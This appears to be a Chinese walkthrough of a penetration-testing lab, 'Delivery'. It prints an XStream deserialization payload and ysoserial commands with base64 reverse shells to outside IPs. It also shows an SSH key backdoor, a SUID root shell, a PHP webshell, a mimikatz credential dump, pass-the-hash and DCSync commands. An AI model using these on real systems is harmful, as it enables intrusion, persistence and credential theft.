春秋云镜-Delivery flag01
请测试 Delivery 暴露在公网上的 Web 应用的安全性,并尝试获取在该服务器上执行任意命令的能力。
fscan扫一下
发现存在ftp的弱口令
连上看看
1.txt里没内容
pom.xml:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 <java.util.PriorityQueue serialization ='custom' > <unserializable-parents /> <java.util.PriorityQueue > <default > <size > 2</size > </default > <int > 3</int > <javax.naming.ldap.Rdn_-RdnEntry > <type > 12345</type > <value class ='com.sun.org.apache.xpath.internal.objects.XString' > <m__obj class ='string' > com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj > </value > </javax.naming.ldap.Rdn_-RdnEntry > <javax.naming.ldap.Rdn_-RdnEntry > <type > 12345</type > <value class ='com.sun.xml.internal.ws.api.message.Packet' serialization ='custom' > <message class ='com.sun.xml.internal.ws.message.saaj.SAAJMessage' > <parsedMessage > true</parsedMessage > <soapVersion > SOAP_11</soapVersion > <bodyParts /> <sm class ='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl' > <attachmentsInitialized > false</attachmentsInitialized > <nullIter class ='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator' > <aliases class ='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl' > <candidates class ='com.sun.jndi.rmi.registry.BindingEnumeration' > <names > <string > aa</string > <string > aa</string > </names > <ctx > <environment /> <registry class ='sun.rmi.registry.RegistryImpl_Stub' serialization ='custom' > <java.rmi.server.RemoteObject > <string > UnicastRef</string > <string > 140.143.143.130</string > <int > 1099</int > <long > 0</long > <int > 0</int > <long > 0</long > <short > 0</short > <boolean > false</boolean > </java.rmi.server.RemoteObject > </registry > <host > 140.143.143.130</host > <port > 1099</port > </ctx > </candidates > </aliases > </nullIter > </sm > </message > </value > </javax.naming.ldap.Rdn_-RdnEntry > </java.util.PriorityQueue > </java.util.PriorityQueue >
可以看到其中有xstream
搜索发现存在CVE-2021-29505
https://blog.csdn.net/qq_42430287/article/details/135229815
利用ysoserial反弹shell
1 2 3 java -cp 1.jar ysoserial.exploit.JRMPListener 1010 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNDAuMTQzLjE0My4xMzAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"
payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 <java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>140.143.143.130</string> <int>1099</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>140.143.143.130</host> <port>1099</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>
反弹过来就是root权限
flag02 老规矩上frp fscan
前面反弹过来shell手残给断了,写个ssh后门保险
echo ‘ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC08aTXlDw5IbzghqEXbl9jeS4HKQJdT9REhatCYTDQ7chjAc5SVgAPDto3lfar8hG2zvc7LR862MTEwkIplWg9iuEZRTwhOFkr8j/CFu80HwHx7neOYlhch14VeOA42NGV94jgqzTPLIiqh99xuUl0vjr/l3ZaNpqCWF+HCX2B7tn78k6/CQT9veYPI9N4ynN08FbqHfiPzCl9LG3hi5+djccR5iUJn1Y3bzWtQqu4V+RKR7eFGTEeRxm7NbWy9BPgbg15IS+AcDhrbiWhkH2ASI5D/6Rj+Nx0PKFBHN56An5Vkx7gncTpsVcUnW3oZIx+XSv1lpGuNQ+xWtFmeXqp2Orgd+5mms3C6lBLeJ1emB/aW77JWWBGSHbAl6F5WNwBaO065Q5Su0tgK0RlXK/LjJGAQOewSKePZevgLAtV1AioIedzl1nnp0vlxwrfgcCvRW1c8gniLuGc4BqpoDNBSUbjys5EwZE8mWfo+3ETVnuzM+KwzA9wJ8/ZfwL54aM= root@kali’ > /root/.ssh/authorized_keys
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 172.22.13.6:139 open 172.22.13.28:135 open 172.22.13.6:135 open 172.22.13.14:22 open 172.22.13.57:80 open 172.22.13.28:80 open 172.22.13.57:22 open 172.22.13.14:80 open 172.22.13.14:21 open 172.22.13.28:3306 open 172.22.13.6:445 open 172.22.13.28:445 open 172.22.13.28:139 open 172.22.13.14:8080 open 172.22.13.28:8000 open 172.22.13.6:88 open [*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works [*] NetInfo [*]172.22.13.28 [->]WIN-HAUWOLAO [->]172.22.13.28 [*] NetInfo [*]172.22.13.6 [->]WIN-DC [->]172.22.13.6 [*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC [*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS [+] ftp 172.22.13.14:21:anonymous [->]1.txt [->]pom.xml [*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单 [*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台 [*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here. [+] mysql 172.22.13.28:3306:root 123456
172.22.13.14 入口机
172.22.13.6 DC 域控
172.22.13.28 域内机器
172.22.13.57 跳板机
提示要打NFS
靶机上下载nfs_offline
nfs_offline_install.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \ sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \ sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \ sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \ sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \ sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb showmount -e 172.22.13.57 mkdir temp mount -t nfs 172.22.13.57:/ ./temp -o nolock 写入ssh公钥 ssh-keygen -t rsa -b 4096 cd /temp/home/joyce/ mkdir .ssh cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys 编译恶意c文件,给到suid root echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c gcc root.c -o root chmod +s root
1 2 3 ssh -i /root/.ssh/id_rsa joyce@172.22.13.57 python3 -c 'import pty;pty.spawn("/bin/bash")' 运行恶意提权文件拿到root
flag3 然后打之前内网扫出来的mysql
navicat连root/123456
show variables like “secure_file_priv”; show variables like “%general%”;
phpstudy起的服务,并且可以写web文件
1 select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
链接蚁剑
flag04 就剩
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 Authentication Id : 0 ; 8786969 (00000000:00861419) Session : RemoteInteractive from 2 User Name : Q1ngchuan Domain : WIN-HAUWOLAO Logon Server : WIN-HAUWOLAO Logon Time : 2024/11/7 15:36:21 SID : S-1-5-21-2057596273-973658165-3030246172-1000 msv : [00000003] Primary * Username : Q1ngchuan * Domain : WIN-HAUWOLAO * NTLM : 397cb3952d50a1e29ee3308179c0ff81 * SHA1 : 330f6c01e54ee24d8dccb230712ef60361a0e2f4 tspkg : wdigest : * Username : Q1ngchuan * Domain : WIN-HAUWOLAO * Password : (null) kerberos : * Username : Q1ngchuan * Domain : WIN-HAUWOLAO * Password : (null) ssp : credman : Authentication Id : 0 ; 8764753 (00000000:0085bd51) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 2024/11/7 15:36:21 SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : d3b77fdc91060b08a3d6288e9ef6348c * SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b tspkg : wdigest : * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * Password : (null) kerberos : * Username : WIN-HAUWOLAO$ * Domain : xiaorang.lab * Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80 ssp : credman : Authentication Id : 0 ; 92043 (00000000:0001678b) Session : Service from 0 User Name : chenglei Domain : XIAORANG Logon Server : WIN-DC Logon Time : 2024/11/7 14:52:57 SID : S-1-5-21-3269458654-3569381900-10559451-1105 msv : [00000003] Primary * Username : chenglei * Domain : XIAORANG * NTLM : 0c00801c30594a1b8eaa889d237c5382 * SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7 * DPAPI : 89b179dc738db098372c365602b7b0f4 tspkg : wdigest : * Username : chenglei * Domain : XIAORANG * Password : (null) kerberos : * Username : chenglei * Domain : XIAORANG.LAB * Password : Xt61f3LBhg1 ssp : credman : Authentication Id : 0 ; 52638 (00000000:0000cd9e) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2024/11/7 14:52:55 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : b5cd3591a58e1169186bcdbfd4b6322d * SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f tspkg : wdigest : * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * Password : (null) kerberos : * Username : WIN-HAUWOLAO$ * Domain : xiaorang.lab * Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR ssp : credman : Authentication Id : 0 ; 52616 (00000000:0000cd88) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2024/11/7 14:52:55 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : d3b77fdc91060b08a3d6288e9ef6348c * SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b tspkg : wdigest : * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * Password : (null) kerberos : * Username : WIN-HAUWOLAO$ * Domain : xiaorang.lab * Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80 ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN-HAUWOLAO$ Domain : XIAORANG Logon Server : (null) Logon Time : 2024/11/7 14:52:55 SID : S-1-5-20 msv : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : d3b77fdc91060b08a3d6288e9ef6348c * SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b tspkg : wdigest : * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * Password : (null) kerberos : * Username : win-hauwolao$ * Domain : XIAORANG.LAB * Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80 ssp : credman : Authentication Id : 0 ; 23854 (00000000:00005d2e) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2024/11/7 14:52:54 SID : msv : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : d3b77fdc91060b08a3d6288e9ef6348c * SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 8786998 (00000000:00861436) Session : RemoteInteractive from 2 User Name : Q1ngchuan Domain : WIN-HAUWOLAO Logon Server : WIN-HAUWOLAO Logon Time : 2024/11/7 15:36:21 SID : S-1-5-21-2057596273-973658165-3030246172-1000 msv : [00000003] Primary * Username : Q1ngchuan * Domain : WIN-HAUWOLAO * NTLM : 397cb3952d50a1e29ee3308179c0ff81 * SHA1 : 330f6c01e54ee24d8dccb230712ef60361a0e2f4 tspkg : wdigest : * Username : Q1ngchuan * Domain : WIN-HAUWOLAO * Password : (null) kerberos : * Username : Q1ngchuan * Domain : WIN-HAUWOLAO * Password : (null) ssp : credman : Authentication Id : 0 ; 8764822 (00000000:0085bd96) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 2024/11/7 15:36:21 SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : d3b77fdc91060b08a3d6288e9ef6348c * SHA1 : 9c6605569086ba9c71d5f6c34fd88b4b4397ae2b tspkg : wdigest : * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * Password : (null) kerberos : * Username : WIN-HAUWOLAO$ * Domain : xiaorang.lab * Password : ad 68 f5 a9 ae 76 24 5f db 80 bf 39 d9 5f bd 4e 2f 17 54 8b b0 81 b2 ff 14 80 7d 27 7b 80 62 09 8a 0c 12 de cc f0 22 a0 b1 ca 68 00 56 91 58 01 52 ad 73 3f 39 d7 9f 11 fa 68 6f 2c 06 47 99 23 3e d9 aa d2 dc 6e 17 bd f4 f2 a5 cc 49 d6 c2 23 ea 8c 9b 1f ea f9 75 f4 e5 17 c3 dd e3 64 4c 67 86 eb 83 2a d4 5f f3 24 65 50 79 a0 d4 27 e2 53 eb 0d 25 c4 85 df 77 cd 6c 10 7c 4b 1f cf 48 68 9c 5e bd 16 01 63 03 b7 4a 3c 87 b9 1b 3c c1 06 3d d6 b4 4d b9 bb 7b f7 f0 5f e8 5a 5f 2b ae ce a5 9d 22 0c 6f 73 df 70 70 a6 dc 72 4f 05 64 d0 f2 8b 2d ba a2 bf e3 0d e4 23 fa 17 9d 32 49 5a cd 0a 6d 0c 3b 2d cd 50 1d 42 17 a3 2a 37 77 2e 25 45 65 b6 37 e6 5c 4b cc 73 7c 4c d1 c1 87 87 d7 c7 7f d9 de ab 91 39 0a 0b 29 bc 4d 49 f8 80 ssp : credman : Authentication Id : 0 ; 92022 (00000000:00016776) Session : Service from 0 User Name : chenglei Domain : XIAORANG Logon Server : WIN-DC Logon Time : 2024/11/7 14:52:57 SID : S-1-5-21-3269458654-3569381900-10559451-1105 msv : [00000003] Primary * Username : chenglei * Domain : XIAORANG * NTLM : 0c00801c30594a1b8eaa889d237c5382 * SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7 * DPAPI : 89b179dc738db098372c365602b7b0f4 tspkg : wdigest : * Username : chenglei * Domain : XIAORANG * Password : (null) kerberos : * Username : chenglei * Domain : XIAORANG.LAB * Password : Xt61f3LBhg1 ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2024/11/7 14:52:55 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : WIN-HAUWOLAO$ Domain : XIAORANG Logon Server : (null) Logon Time : 2024/11/7 14:52:54 SID : S-1-5-18 msv : tspkg : wdigest : * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * Password : (null) kerberos : * Username : win-hauwolao$ * Domain : XIAORANG.LAB * Password : (null) ssp : credman :
打pth拿到SYSTEM
1 sekurlsa::pth /user:WIN-HAUWOLAO$ /domain:XIAORANG.LAB /ntlm:d3b77fdc91060b08a3d6288e9ef6348c
BloodHound进行信息 搜集
给chenglei去添加DCSync权限
1 proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6
1 proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6